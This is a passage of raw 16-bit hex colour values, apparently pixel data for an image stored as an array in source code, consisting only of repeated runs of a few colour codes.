0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
